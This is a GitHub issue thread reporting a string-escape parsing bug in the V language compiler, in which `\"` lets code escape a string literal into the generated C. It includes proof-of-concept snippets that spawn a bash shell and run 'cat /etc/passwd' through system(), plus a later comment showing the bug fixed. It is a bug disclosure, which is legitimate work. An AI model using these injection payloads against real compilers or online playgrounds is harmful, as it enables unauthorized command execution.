### ISSUE TITLE
String escape parsing bug

### ISSUE THREAD

**Issue by ogniK5377** [vlang/v#849]
**V version:** 0.1.10
**OS:** Linux

**What did you do?**
```
import log

fn main(){
    mut l := log.Log{level:log.INFO} // Needed to break out
    mut shell_cmd := 'bash' // Drop a shell
    l.info('Breaking out\") ); system(shell_cmd.str); // ') 
    l.info(shell_cmd) // Needed to at least call the var once
    l.info('we\'re done here')
}
```

**What did you expect to see?**
No shell
 
**What did you see instead?**
```
$ ./v_linux run exploit.v
============ running exploit ============
[I]Breaking out\
$ whoami
ExploitationUser
$ echo hello from bash
hello from bash
$ exit
exit
[I]bash
[I]we're done here
$
```

**Comment by ogniK5377** [comment]
Works with anything which takes a string, including variables
```
mut meme := 'echo test & \"); system(meme.str); // '
println(meme)
```

**Comment by medvednikov** [comment]
Caused by `\"` as I understand. Will fix, thanks

**Comment by decadedelta** [comment]
"Arbitrary code execution"? Nah. Just the code you compiled in :P

**Comment by ogniK5377** [comment]
> "Arbitrary code execution"? Nah. Just the code you compiled in :P
> 
> I was genuinely concerned reading the title.

I guess improperly parsing strings and injecting arbitrary C code is considered okay, especially when you can inject arbitrary C code with only using variables and have access to call anything you want, including things which are considered "private functions". On top of all that, the ability to drop shells solely based on input and on websites which offer a "Playground" feature is considered okay

**Comment by decadedelta** [comment]
Well, considering V can (or should) be able to do everything C can, I really don't see the issue with "injecting arbitrary C code" (should I mention V had a `#` directive which allowed exactly that? and it was removed for being a hack, not for security reasons or whatever, the language was just as secure after removing it)

> ability to drop shells solely based on input
Mind explaining a bit better? It's only a parsing issue, there's nothing you can do at runtime to "inject your own code", which is why I don't call it "arbitrary code execution". If you have access to the source, might as well do whatever the hell you want and blow everything up.

> websites which offer a "Playground" feature
Again, you can pretty much destroy everything using V alone if you don't have anything set up to counter that. (And no, this isn't implemented by actually looking at the source file and checking if it's dangerous. Most people that know what they're doing just patch certain calls or sandbox the whole thing altogether. Running such a playground feature is a risk in itself.)

**Comment by lutherwenxu** [comment]
A more minimalistic sample:
```go
fn main(){
	shell_cmd := 'cat /etc/passwd'
	println(shell_cmd) // Not necessary but suppresses unused warning.
	println('Test example: \")); system(shell_cmd.str); //')
}
```

**Comment by yuyi98** [comment]
```v
fn main() {
	shell_cmd := 'cat /etc/passwd'
	println(shell_cmd) // Not necessary but suppresses unused warning.
	println('Test example: \")); system(shell_cmd.str); //')
}

PS D:\Test\v\tt1> v run .
cat /etc/passwd
Test example: ")); system(shell_cmd.str); //
```

It's right.
